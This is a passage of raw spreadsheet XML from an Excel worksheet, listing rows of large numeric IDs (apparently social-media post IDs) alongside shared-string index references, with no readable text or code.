        <v>1.23268576349982E+18</v>
      </c>
      <c r="B8880" t="s">
        <v>21351</v>
      </c>
      <c r="C8880" t="s">
        <v>1</v>
      </c>
      <c r="D8880" t="s">
        <v>2456</v>
      </c>
      <c r="E8880" t="s">
        <v>2102</v>
      </c>
    </row>
    <row r="8881" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8881">
        <v>1.2326855232375501E+18</v>
      </c>
      <c r="B8881" t="s">
        <v>21352</v>
      </c>
      <c r="C8881" t="s">
        <v>1</v>
      </c>
      <c r="D8881" t="s">
        <v>21353</v>
      </c>
      <c r="E8881" t="s">
        <v>21354</v>
      </c>
    </row>
    <row r="8882" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8882">
        <v>1.23268549953136E+18</v>
      </c>
      <c r="B8882" t="s">
        <v>21355</v>
      </c>
      <c r="C8882" t="s">
        <v>1</v>
      </c>
      <c r="D8882" t="s">
        <v>21356</v>
      </c>
      <c r="E8882" t="s">
        <v>8510</v>
      </c>
    </row>
    <row r="8883" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8883">
        <v>1.2326853225904499E+18</v>
      </c>
      <c r="B8883" t="s">
        <v>21357</v>
      </c>
      <c r="C8883" t="s">
        <v>1</v>
      </c>
      <c r="D8883" t="s">
        <v>21358</v>
      </c>
      <c r="E8883" t="s">
        <v>13863</v>
      </c>
    </row>
    <row r="8884" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8884">
        <v>1.23268484951905E+18</v>
      </c>
      <c r="B8884" t="s">
        <v>21359</v>
      </c>
      <c r="C8884" t="s">
        <v>1</v>
      </c>
      <c r="D8884" t="s">
        <v>21360</v>
      </c>
      <c r="E8884" t="s">
        <v>21361</v>
      </c>
    </row>
    <row r="8885" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8885">
        <v>1.2326845594032399E+18</v>
      </c>
      <c r="B8885" t="s">
        <v>21362</v>
      </c>
      <c r="C8885" t="s">
        <v>1</v>
      </c>
      <c r="D8885" t="s">
        <v>21363</v>
      </c>
      <c r="E8885" t="s">
        <v>16644</v>
      </c>
    </row>
    <row r="8886" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8886">
        <v>1.2326840179815099E+18</v>
      </c>
      <c r="B8886" t="s">
        <v>21364</v>
      </c>
      <c r="C8886" t="s">
        <v>1</v>
      </c>
      <c r="D8886" t="s">
        <v>21365</v>
      </c>
      <c r="E8886" t="s">
        <v>1913</v>
      </c>
    </row>
    <row r="8887" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8887">
        <v>1.2326836260613601E+18</v>
      </c>
      <c r="B8887" t="s">
        <v>21366</v>
      </c>
      <c r="C8887" t="s">
        <v>1</v>
      </c>
      <c r="D8887" t="s">
        <v>21367</v>
      </c>
      <c r="E8887" t="s">
        <v>21368</v>
      </c>
    </row>
    <row r="8888" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8888">
        <v>1.2326834418896399E+18</v>
      </c>
      <c r="B8888" t="s">
        <v>21369</v>
      </c>
      <c r="C8888" t="s">
        <v>1</v>
      </c>
      <c r="D8888" t="s">
        <v>21370</v>
      </c>
      <c r="E8888" t="s">
        <v>8947</v>
      </c>
    </row>
    <row r="8889" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8889">
        <v>1.2326833906101E+18</v>
      </c>
      <c r="B8889" t="s">
        <v>21371</v>
      </c>
      <c r="C8889" t="s">
        <v>1</v>
      </c>
      <c r="D8889" t="s">
        <v>21372</v>
      </c>
      <c r="E8889" t="s">
        <v>1783</v>
      </c>
    </row>
    <row r="8890" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8890">
        <v>1.23268331861907E+18</v>
      </c>
      <c r="B8890" t="s">
        <v>21373</v>
      </c>
      <c r="C8890" t="s">
        <v>1</v>
      </c>
      <c r="D8890" t="s">
        <v>21374</v>
      </c>
      <c r="E8890" t="s">
        <v>7226</v>
      </c>
    </row>
    <row r="8891" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8891">
        <v>1.23268309881235E+18</v>
      </c>
      <c r="B8891" t="s">
        <v>21375</v>
      </c>
      <c r="C8891" t="s">
        <v>1</v>
      </c>
      <c r="D8891" t="s">
        <v>21376</v>
      </c>
      <c r="E8891" t="s">
        <v>7466</v>
      </c>
    </row>
    <row r="8892" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8892">
        <v>1.23268308882157E+18</v>
      </c>
      <c r="B8892" t="s">
        <v>21377</v>
      </c>
      <c r="C8892" t="s">
        <v>1</v>
      </c>
      <c r="D8892" t="s">
        <v>21378</v>
      </c>
      <c r="E8892" t="s">
        <v>8350</v>
      </c>
    </row>
    <row r="8893" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8893">
        <v>1.2326829231842601E+18</v>
      </c>
      <c r="B8893" t="s">
        <v>21379</v>
      </c>
      <c r="C8893" t="s">
        <v>1</v>
      </c>
      <c r="D8893" t="s">
        <v>21380</v>
      </c>
      <c r="E8893" t="s">
        <v>7365</v>
      </c>
    </row>
    <row r="8894" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8894">
        <v>1.2326829144515699E+18</v>
      </c>
      <c r="B8894" t="s">
        <v>21381</v>
      </c>
      <c r="C8894" t="s">
        <v>1</v>
      </c>
      <c r="D8894" t="s">
        <v>21382</v>
      </c>
      <c r="E8894" t="s">
        <v>18605</v>
      </c>
    </row>
    <row r="8895" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8895">
        <v>1.2326826785389701E+18</v>
      </c>
      <c r="B8895" t="s">
        <v>21383</v>
      </c>
      <c r="C8895" t="s">
        <v>1</v>
      </c>
      <c r="D8895" t="s">
        <v>21384</v>
      </c>
      <c r="E8895" t="s">
        <v>6037</v>
      </c>
    </row>
    <row r="8896" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8896">
        <v>1.2326824689789701E+18</v>
      </c>
      <c r="B8896" t="s">
        <v>21385</v>
      </c>
      <c r="C8896" t="s">
        <v>1</v>
      </c>
      <c r="D8896" t="s">
        <v>21386</v>
      </c>
      <c r="E8896" t="s">
        <v>21387</v>
      </c>
    </row>
    <row r="8897" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8897">
        <v>1.23268230231823E+18</v>
      </c>
      <c r="B8897" t="s">
        <v>21388</v>
      </c>
      <c r="C8897" t="s">
        <v>1</v>
      </c>
      <c r="D8897" t="s">
        <v>21389</v>
      </c>
      <c r="E8897" t="s">
        <v>8309</v>
      </c>
    </row>
    <row r="8898" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8898">
        <v>1.23268228848126E+18</v>
      </c>
      <c r="B8898" t="s">
        <v>21390</v>
      </c>
      <c r="C8898" t="s">
        <v>1</v>
      </c>
      <c r="D8898" t="s">
        <v>21391</v>
      </c>
      <c r="E8898" t="s">
        <v>21392</v>
      </c>
    </row>
    <row r="8899" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8899">
        <v>1.23268205318495E+18</v>
      </c>
      <c r="B8899" t="s">
        <v>21393</v>
      </c>
      <c r="C8899" t="s">
        <v>1</v>
      </c>
      <c r="D8899" t="s">
        <v>21394</v>
      </c>
      <c r="E8899" t="s">
        <v>12917</v>
      </c>
    </row>
    <row r="8900" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8900">
        <v>1.23268199115104E+18</v>
      </c>
      <c r="B8900" t="s">
        <v>21395</v>
      </c>
      <c r="C8900" t="s">
        <v>1</v>
      </c>
      <c r="D8900" t="s">
        <v>21396</v>
      </c>
      <c r="E8900" t="s">
        <v>11509</v>
      </c>
    </row>
    <row r="8901" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8901">
        <v>1.23268197837535E+18</v>
      </c>
      <c r="B8901" t="s">
        <v>21397</v>
      </c>
      <c r="C8901" t="s">
        <v>1</v>
      </c>
      <c r="D8901" t="s">
        <v>21398</v>
      </c>
      <c r="E8901" t="s">
        <v>1972</v>
      </c>
    </row>
    <row r="8902" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8902">
        <v>1.2326819253928901E+18</v>
      </c>
      <c r="B8902" t="s">
        <v>21399</v>
      </c>
      <c r="C8902" t="s">
        <v>1</v>
      </c>
      <c r="D8902" t="s">
        <v>16226</v>
      </c>
      <c r="E8902" t="s">
        <v>5049</v>
      </c>
    </row>
    <row r="8903" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8903">
        <v>1.23268190022707E+18</v>
      </c>
      <c r="B8903" t="s">
        <v>21400</v>
      </c>
      <c r="C8903" t="s">
        <v>1</v>
      </c>
      <c r="D8903" t="s">
        <v>21401</v>
      </c>
      <c r="E8903" t="s">
        <v>21402</v>
      </c>
    </row>
    <row r="8904" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8904">
        <v>1.2326818516277199E+18</v>
      </c>
      <c r="B8904" t="s">
        <v>21403</v>
      </c>
      <c r="C8904" t="s">
        <v>1</v>
      </c>
      <c r="D8904" t="s">
        <v>21404</v>
      </c>
      <c r="E8904" t="s">
        <v>8241</v>
      </c>
    </row>
    <row r="8905" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8905">
        <v>1.2326817457215401E+18</v>
      </c>
      <c r="B8905" t="s">
        <v>21405</v>
      </c>
      <c r="C8905" t="s">
        <v>1</v>
      </c>
      <c r="D8905" t="s">
        <v>21406</v>
      </c>
      <c r="E8905" t="s">
        <v>2498</v>
      </c>
    </row>
    <row r="8906" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8906">
        <v>1.23268141362495E+18</v>
      </c>
      <c r="B8906" t="s">
        <v>21407</v>
      </c>
      <c r="C8906" t="s">
        <v>1</v>
      </c>
      <c r="D8906" t="s">
        <v>21408</v>
      </c>
      <c r="E8906" t="s">
        <v>21409</v>
      </c>
    </row>
    <row r="8907" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8907">
        <v>1.2326807421294001E+18</v>
      </c>
      <c r="B8907" t="s">
        <v>21410</v>
      </c>
      <c r="C8907" t="s">
        <v>1</v>
      </c>
      <c r="D8907" t="s">
        <v>21411</v>
      </c>
      <c r="E8907" t="s">
        <v>21412</v>
      </c>
    </row>
    <row r="8908" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8908">
        <v>1.23268066736595E+18</v>
      </c>
      <c r="B8908" t="s">
        <v>21413</v>
      </c>
      <c r="C8908" t="s">
        <v>1</v>
      </c>
      <c r="D8908" t="s">
        <v>21414</v>
      </c>
      <c r="E8908" t="s">
        <v>21415</v>
      </c>
    </row>
    <row r="8909" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8909">
        <v>1.23268046642941E+18</v>
      </c>
      <c r="B8909" t="s">
        <v>21416</v>
      </c>
      <c r="C8909" t="s">
        <v>1</v>
      </c>
      <c r="D8909" t="s">
        <v>21417</v>
      </c>
      <c r="E8909" t="s">
        <v>3004</v>
      </c>
    </row>
    <row r="8910" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8910">
        <v>1.23268027829391E+18</v>
      </c>
      <c r="B8910" t="s">
        <v>21418</v>
      </c>
      <c r="C8910" t="s">
        <v>1</v>
      </c>
      <c r="D8910" t="s">
        <v>21419</v>
      </c>
      <c r="E8910" t="s">
        <v>1942</v>
      </c>
    </row>
    <row r="8911" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8911">
        <v>1.23267949692867E+18</v>
      </c>
      <c r="B8911" t="s">
        <v>21420</v>
      </c>
      <c r="C8911" t="s">
        <v>1</v>
      </c>
      <c r="D8911" t="s">
        <v>21421</v>
      </c>
      <c r="E8911" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="8912" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8912">
        <v>1.2326794163098701E+18</v>
      </c>
      <c r="B8912" t="s">
        <v>21422</v>
      </c>
      <c r="C8912" t="s">
        <v>1</v>
      </c>
      <c r="D8912" t="s">
        <v>21423</v>
      </c>
      <c r="E8912" t="s">
        <v>21424</v>
      </c>
    </row>
    <row r="8913" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8913">
        <v>1.23267865108834E+18</v>
      </c>
      <c r="B8913" t="s">
        <v>21425</v>
      </c>
      <c r="C8913" t="s">
        <v>1</v>
      </c>
      <c r="D8913" t="s">
        <v>21426</v>
      </c>
      <c r="E8913" t="s">
        <v>21427</v>
      </c>
    </row>
    <row r="8914" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8914">
        <v>1.2326782110976399E+18</v>
      </c>
      <c r="B8914" t="s">
        <v>21428</v>
      </c>
      <c r="C8914" t="s">
        <v>1</v>
      </c>
      <c r="D8914" t="s">
        <v>21429</v>
      </c>
      <c r="E8914" t="s">
        <v>12930</v>
      </c>
    </row>
    <row r="8915" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8915">
        <v>1.23267802522705E+18</v>
      </c>
      <c r="B8915" t="s">
        <v>21430</v>
      </c>
      <c r="C8915" t="s">
        <v>1</v>
      </c>
      <c r="D8915" t="s">
        <v>21431</v>
      </c>
      <c r="E8915" t="s">
        <v>2533</v>
      </c>
    </row>
    <row r="8916" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8916">
        <v>1.23267798078846E+18</v>
      </c>
      <c r="B8916" t="s">
        <v>21432</v>
      </c>
      <c r="C8916" t="s">
        <v>1</v>
      </c>
      <c r="D8916" t="s">
        <v>21433</v>
      </c>
      <c r="E8916" t="s">
        <v>1983</v>
      </c>
    </row>
    <row r="8917" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8917">
        <v>1.23267557513683E+18</v>
      </c>
      <c r="B8917" t="s">
        <v>21434</v>
      </c>
      <c r="C8917" t="s">
        <v>1</v>
      </c>
      <c r="D8917" t="s">
        <v>21435</v>
      </c>
      <c r="E8917" t="s">
        <v>21436</v>
      </c>
    </row>
    <row r="8918" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8918">
        <v>1.23267494019887E+18</v>
      </c>
      <c r="B8918" t="s">
        <v>21437</v>
      </c>
      <c r="C8918" t="s">
        <v>1</v>
      </c>
      <c r="D8918" t="s">
        <v>21438</v>
      </c>
      <c r="E8918" t="s">
        <v>15279</v>
      </c>
    </row>
    <row r="8919" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8919">
        <v>1.23267485395154E+18</v>
      </c>
      <c r="B8919" t="s">
        <v>21439</v>
      </c>
      <c r="C8919" t="s">
        <v>1</v>
      </c>
      <c r="D8919" t="s">
        <v>21440</v>
      </c>
      <c r="E8919" t="s">
        <v>7472</v>
      </c>
    </row>
    <row r="8920" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8920">
        <v>1.23267478085747E+18</v>
      </c>
      <c r="B8920" t="s">
        <v>21441</v>
      </c>
      <c r="C8920" t="s">
        <v>1</v>
      </c>
      <c r="D8920" t="s">
        <v>21442</v>
      </c>
      <c r="E8920" t="s">
        <v>16327</v>
      </c>
    </row>
    <row r="8921" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8921">
        <v>1.2326747763234299E+18</v>
      </c>
      <c r="B8921" t="s">
        <v>21443</v>
      </c>
      <c r="C8921" t="s">
        <v>1</v>
      </c>
      <c r="D8921" t="s">
        <v>21444</v>
      </c>
      <c r="E8921" t="s">
        <v>18578</v>
      </c>
    </row>
    <row r="8922" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8922">
        <v>1.2326745998731899E+18</v>
      </c>
      <c r="B8922" t="s">
        <v>21445</v>
      </c>
      <c r="C8922" t="s">
        <v>1</v>
      </c>
      <c r="D8922" t="s">
        <v>21446</v>
      </c>
      <c r="E8922" t="s">
        <v>14335</v>
      </c>
    </row>
    <row r="8923" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8923">
        <v>1.23267417737263E+18</v>
      </c>
      <c r="B8923" t="s">
        <v>21447</v>
      </c>
      <c r="C8923" t="s">
        <v>1</v>
      </c>
      <c r="D8923" t="s">
        <v>8082</v>
      </c>
      <c r="E8923" t="s">
        <v>8083</v>
      </c>
    </row>
    <row r="8924" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8924">
        <v>1.2326739216792801E+18</v>
      </c>
      <c r="B8924" t="s">
        <v>21448</v>
      </c>
      <c r="C8924" t="s">
        <v>1</v>
      </c>
      <c r="D8924" t="s">
        <v>21449</v>
      </c>
      <c r="E8924" t="s">
        <v>21450</v>
      </c>
    </row>
    <row r="8925" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8925">
        <v>1.23267368205025E+18</v>
      </c>
      <c r="B8925" t="s">
        <v>21451</v>
      </c>
      <c r="C8925" t="s">
        <v>1</v>
      </c>
      <c r="D8925" t="s">
        <v>21452</v>
      </c>
      <c r="E8925" t="s">
        <v>11284</v>
      </c>
    </row>
    <row r="8926" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8926">
        <v>1.2326734307149901E+18</v>
      </c>
      <c r="B8926" t="s">
        <v>21453</v>
      </c>
      <c r="C8926" t="s">
        <v>1</v>
      </c>
      <c r="D8926" t="s">
        <v>21454</v>
      </c>
      <c r="E8926" t="s">
        <v>11284</v>
      </c>
    </row>
    <row r="8927" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8927">
        <v>1.2326729694045701E+18</v>
      </c>
      <c r="B8927" t="s">
        <v>21455</v>
      </c>
      <c r="C8927" t="s">
        <v>1</v>
      </c>
      <c r="D8927" t="s">
        <v>21456</v>
      </c>
      <c r="E8927" t="s">
        <v>20120</v>
      </c>
    </row>
    <row r="8928" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8928">
        <v>1.23267238640482E+18</v>
      </c>
      <c r="B8928" t="s">
        <v>21457</v>
      </c>
      <c r="C8928" t="s">
        <v>1</v>
      </c>
      <c r="D8928" t="s">
        <v>21458</v>
      </c>
      <c r="E8928" t="s">
        <v>9122</v>
      </c>
    </row>
    <row r="8929" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8929">
        <v>1.2326718063074199E+18</v>
      </c>
      <c r="B8929" t="s">
        <v>21459</v>
      </c>
      <c r="C8929" t="s">
        <v>1</v>
      </c>
      <c r="D8929" t="s">
        <v>21460</v>
      </c>
      <c r="E8929" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="8930" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8930">
        <v>1.23267166095794E+18</v>
      </c>
      <c r="B8930" t="s">
        <v>21461</v>
      </c>
      <c r="C8930" t="s">
        <v>1</v>
      </c>
      <c r="D8930" t="s">
        <v>21462</v>
      </c>
      <c r="E8930" t="s">
        <v>20752</v>
      </c>
    </row>
    <row r="8931" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8931">
        <v>1.23267154649117E+18</v>
      </c>
      <c r="B8931" t="s">
        <v>21463</v>
      </c>
      <c r="C8931" t="s">
        <v>1</v>
      </c>
      <c r="D8931" t="s">
        <v>21464</v>
      </c>
      <c r="E8931" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="8932" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8932">
        <v>1.2326710682313201E+18</v>
      </c>
      <c r="B8932" t="s">
        <v>21465</v>
      </c>
      <c r="C8932" t="s">
        <v>1</v>
      </c>
      <c r="D8932" t="s">
        <v>21466</v>
      </c>
      <c r="E8932" t="s">
        <v>21467</v>
      </c>
    </row>
    <row r="8933" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8933">
        <v>1.2326704784829599E+18</v>
      </c>
      <c r="B8933" t="s">
        <v>21468</v>
      </c>
      <c r="C8933" t="s">
        <v>1</v>
      </c>
      <c r="D8933" t="s">
        <v>21469</v>
      </c>
      <c r="E8933" t="s">
        <v>21470</v>
      </c>
    </row>
    <row r="8934" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8934">
        <v>1.2326704021634801E+18</v>
      </c>
      <c r="B8934" t="s">
        <v>21471</v>
      </c>
      <c r="C8934" t="s">
        <v>1</v>
      </c>
      <c r="D8934" t="s">
        <v>21472</v>
      </c>
      <c r="E8934" t="s">
        <v>21473</v>
      </c>
    </row>
    <row r="8935" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8935">
        <v>1.2326702849829601E+18</v>
      </c>
      <c r="B8935" t="s">
        <v>21474</v>
      </c>
      <c r="C8935" t="s">
        <v>1</v>
      </c>
      <c r="D8935" t="s">
        <v>21475</v>
      </c>
      <c r="E8935" t="s">
        <v>21476</v>
      </c>
    </row>
    <row r="8936" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8936">
        <v>1.2326702751808499E+18</v>
      </c>
      <c r="B8936" t="s">
        <v>21477</v>
      </c>
      <c r="C8936" t="s">
        <v>1</v>
      </c>
      <c r="D8936" t="s">
        <v>21478</v>
      </c>
      <c r="E8936" t="s">
        <v>21479</v>
      </c>
    </row>
    <row r="8937" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8937">
        <v>1.23267021921202E+18</v>
      </c>
      <c r="B8937" t="s">
        <v>21480</v>
      </c>
      <c r="C8937" t="s">
        <v>1</v>
      </c>
      <c r="D8937" t="s">
        <v>21481</v>
      </c>
      <c r="E8937" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="8938" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8938">
        <v>1.23266988803408E+18</v>
      </c>
      <c r="B8938" t="s">
        <v>21482</v>
      </c>
      <c r="C8938" t="s">
        <v>1</v>
      </c>
      <c r="D8938" t="s">
        <v>21483</v>
      </c>
      <c r="E8938" t="s">
        <v>21484</v>
      </c>
    </row>
    <row r="8939" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8939">
        <v>1.2326693514441201E+18</v>
      </c>
      <c r="B8939" t="s">
        <v>21485</v>
      </c>
      <c r="C8939" t="s">
        <v>1</v>
      </c>
      <c r="D8939" t="s">
        <v>21486</v>
      </c>
      <c r="E8939" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="8940" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8940">
        <v>1.2326692667443899E+18</v>
      </c>
      <c r="B8940" t="s">
        <v>21487</v>
      </c>
      <c r="C8940" t="s">
        <v>1</v>
      </c>
      <c r="D8940" t="s">
        <v>21488</v>
      </c>
      <c r="E8940" t="s">
        <v>18724</v>
      </c>
    </row>
    <row r="8941" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8941">
        <v>1.2326691915698299E+18</v>
      </c>
      <c r="B8941" t="s">
        <v>21489</v>
      </c>
      <c r="C8941" t="s">
        <v>1</v>
      </c>
      <c r="D8941" t="s">
        <v>21490</v>
      </c>
      <c r="E8941" t="s">
        <v>2649</v>
      </c>
    </row>
    <row r="8942" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8942">
        <v>1.2326691416534999E+18</v>
      </c>
      <c r="B8942" t="s">
        <v>21491</v>
      </c>
      <c r="C8942" t="s">
        <v>1</v>
      </c>
      <c r="D8942" t="s">
        <v>21492</v>
      </c>
      <c r="E8942" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="8943" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8943">
        <v>1.2326691392626299E+18</v>
      </c>
      <c r="B8943" t="s">
        <v>21491</v>
      </c>
      <c r="C8943" t="s">
        <v>1</v>
      </c>
      <c r="D8943" t="s">
        <v>21493</v>
      </c>
      <c r="E8943" t="s">
        <v>2644</v>
      </c>
    </row>
    <row r="8944" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8944">
        <v>1.23266895998558E+18</v>
      </c>
      <c r="B8944" t="s">
        <v>21494</v>
      </c>
      <c r="C8944" t="s">
        <v>1</v>
      </c>
      <c r="D8944" t="s">
        <v>21495</v>
      </c>
      <c r="E8944" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="8945" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8945">
        <v>1.2326689083662999E+18</v>
      </c>
      <c r="B8945" t="s">
        <v>21496</v>
      </c>
      <c r="C8945" t="s">
        <v>1</v>
      </c>
      <c r="D8945" t="s">
        <v>21497</v>
      </c>
      <c r="E8945" t="s">
        <v>21498</v>
      </c>
    </row>
    <row r="8946" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8946">
        <v>1.2326688727314299E+18</v>
      </c>
      <c r="B8946" t="s">
        <v>21499</v>
      </c>
      <c r="C8946" t="s">
        <v>1</v>
      </c>
      <c r="D8946" t="s">
        <v>21500</v>
      </c>
      <c r="E8946" t="s">
        <v>7789</v>
      </c>
    </row>
    <row r="8947" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8947">
        <v>1.2326686582012101E+18</v>
      </c>
      <c r="B8947" t="s">
        <v>21501</v>
      </c>
      <c r="C8947" t="s">
        <v>1</v>
      </c>
      <c r="D8947" t="s">
        <v>21502</v>
      </c>
      <c r="E8947" t="s">
        <v>5890</v>
      </c>
    </row>
    <row r="8948" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8948">
        <v>1.2326685704354299E+18</v>
      </c>
      <c r="B8948" t="s">
        <v>21503</v>
      </c>
      <c r="C8948" t="s">
        <v>1</v>
      </c>
      <c r="D8948" t="s">
        <v>21504</v>
      </c>
      <c r="E8948" t="s">
        <v>8663</v>
      </c>
    </row>
    <row r="8949" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8949">
        <v>1.2326681458249999E+18</v>
      </c>
      <c r="B8949" t="s">
        <v>21505</v>
      </c>
      <c r="C8949" t="s">
        <v>1</v>
      </c>
      <c r="D8949" t="s">
        <v>21506</v>
      </c>
      <c r="E8949" t="s">
        <v>21507</v>
      </c>
    </row>
    <row r="8950" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8950">
        <v>1.2326674626736E+18</v>
      </c>
      <c r="B8950" t="s">
        <v>21508</v>
      </c>
      <c r="C8950" t="s">
        <v>1</v>
      </c>
      <c r="D8950" t="s">
        <v>21509</v>
      </c>
      <c r="E8950" t="s">
        <v>7460</v>
      </c>
    </row>
    <row r="8951" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8951">
        <v>1.2326673840429199E+18</v>
      </c>
      <c r="B8951" t="s">
        <v>21510</v>
      </c>
      <c r="C8951" t="s">
        <v>1</v>
      </c>
      <c r="D8951" t="s">
        <v>21511</v>
      </c>
      <c r="E8951" t="s">
        <v>7307</v>
      </c>
    </row>
    <row r="8952" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8952">
        <v>1.23266733658862E+18</v>
      </c>
      <c r="B8952" t="s">
        <v>21512</v>
      </c>
      <c r="C8952" t="s">
        <v>1</v>
      </c>
      <c r="D8952" t="s">
        <v>21513</v>
      </c>
      <c r="E8952" t="s">
        <v>8396</v>
      </c>
    </row>
    <row r="8953" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8953">
        <v>1.2326673318826299E+18</v>
      </c>
      <c r="B8953" t="s">
        <v>21514</v>
      </c>
      <c r="C8953" t="s">
        <v>1</v>
      </c>
      <c r="D8953" t="s">
        <v>21515</v>
      </c>
      <c r="E8953" t="s">
        <v>21227</v>
      </c>
    </row>
    <row r="8954" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8954">
        <v>1.23266726264303E+18</v>
      </c>
      <c r="B8954" t="s">
        <v>21516</v>
      </c>
      <c r="C8954" t="s">
        <v>1</v>
      </c>
      <c r="D8954" t="s">
        <v>21517</v>
      </c>
      <c r="E8954" t="s">
        <v>10360</v>
      </c>
    </row>
    <row r="8955" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8955">
        <v>1.2326672155618299E+18</v>
      </c>
      <c r="B8955" t="s">
        <v>21518</v>
      </c>
      <c r="C8955" t="s">
        <v>1</v>
      </c>
      <c r="D8955" t="s">
        <v>21519</v>
      </c>
      <c r="E8955" t="s">
        <v>21520</v>
      </c>
    </row>
    <row r="8956" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8956">
        <v>1.23266695283073E+18</v>
      </c>
      <c r="B8956" t="s">
        <v>21521</v>
      </c>
      <c r="C8956" t="s">
        <v>1</v>
      </c>
      <c r="D8956" t="s">
        <v>21522</v>
      </c>
      <c r="E8956" t="s">
        <v>2671</v>
      </c>
    </row>
    <row r="8957" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8957">
        <v>1.2326666426535401E+18</v>
      </c>
      <c r="B8957" t="s">
        <v>21523</v>
      </c>
      <c r="C8957" t="s">
        <v>1</v>
      </c>
      <c r="D8957" t="s">
        <v>21524</v>
      </c>
      <c r="E8957" t="s">
        <v>21525</v>
      </c>
    </row>
    <row r="8958" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8958">
        <v>1.23266663760782E+18</v>
      </c>
      <c r="B8958" t="s">
        <v>21526</v>
      </c>
      <c r="C8958" t="s">
        <v>1</v>
      </c>
      <c r="D8958" t="s">
        <v>21527</v>
      </c>
      <c r="E8958" t="s">
        <v>21528</v>
      </c>
    </row>
    <row r="8959" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8959">
        <v>1.2326666319623199E+18</v>
      </c>
      <c r="B8959" t="s">
        <v>21529</v>
      </c>
      <c r="C8959" t="s">
        <v>1</v>
      </c>
      <c r="D8959" t="s">
        <v>21530</v>
      </c>
      <c r="E8959" t="s">
        <v>8053</v>
      </c>
    </row>
    <row r="8960" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8960">
        <v>1.2326664647689999E+18</v>
      </c>
      <c r="B8960" t="s">
        <v>21531</v>
      </c>
      <c r="C8960" t="s">
        <v>1</v>
      </c>
      <c r="D8960" t="s">
        <v>21532</v>
      </c>
      <c r="E8960" t="s">
        <v>21533</v>
      </c>
    </row>
    <row r="8961" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8961">
        <v>1.2326659040073001E+18</v>
      </c>
      <c r="B8961" t="s">
        <v>21534</v>
      </c>
